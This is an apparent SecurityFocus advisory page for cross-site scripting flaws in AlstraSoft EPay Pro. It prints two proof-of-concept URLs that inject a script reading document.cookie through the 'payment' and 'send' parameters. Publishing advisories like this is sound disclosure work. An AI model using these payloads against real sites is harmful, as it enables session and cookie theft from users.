Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

AlstraSoft EPay Pro Multiple Cross-Site Scripting Vulnerabilities

An exploit is not required.

The following examples are available:

http://www.example.com/epal/?order_num=crap&payment="><script>alert(document.cookie)</script>&send=first&send=regular&send=priority&send=express
Pops cookie

http://www.example.com/epal/?order_num=crap&payment=crap&send=first&send=regular&send=priority&send='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie







 

Privacy Statement
Copyright 2008, SecurityFocus